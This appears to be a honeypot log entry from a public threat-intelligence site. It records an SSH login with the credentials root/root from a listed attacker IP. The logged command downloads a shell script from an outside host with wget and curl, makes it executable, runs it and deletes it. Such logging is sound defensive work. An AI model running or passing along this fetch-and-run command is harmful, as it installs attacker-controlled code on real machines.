Time | 2024/08/27, 08:28:19 (GMT) |
Transaction ID | H7KTN9582BZYYNMX |
Service | ssh |
Location | US (United States) |
Attacker | 174.138.36.202 |
Classification | Web script execution |
Harm Potential | High |
174.138.36.202 client username 'root' and password 'root' entered 174.138.36.202 client command : 'wget http://159.253.120.29/8UsA.sh; curl -O http://159.253.120.29/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; rm -rf 8UsA.sh'
All observations are coming from honeypot central database.
Please share your wishes, opinions and suggestions with us: Honeypots.tk Admin |
If you like, you can support |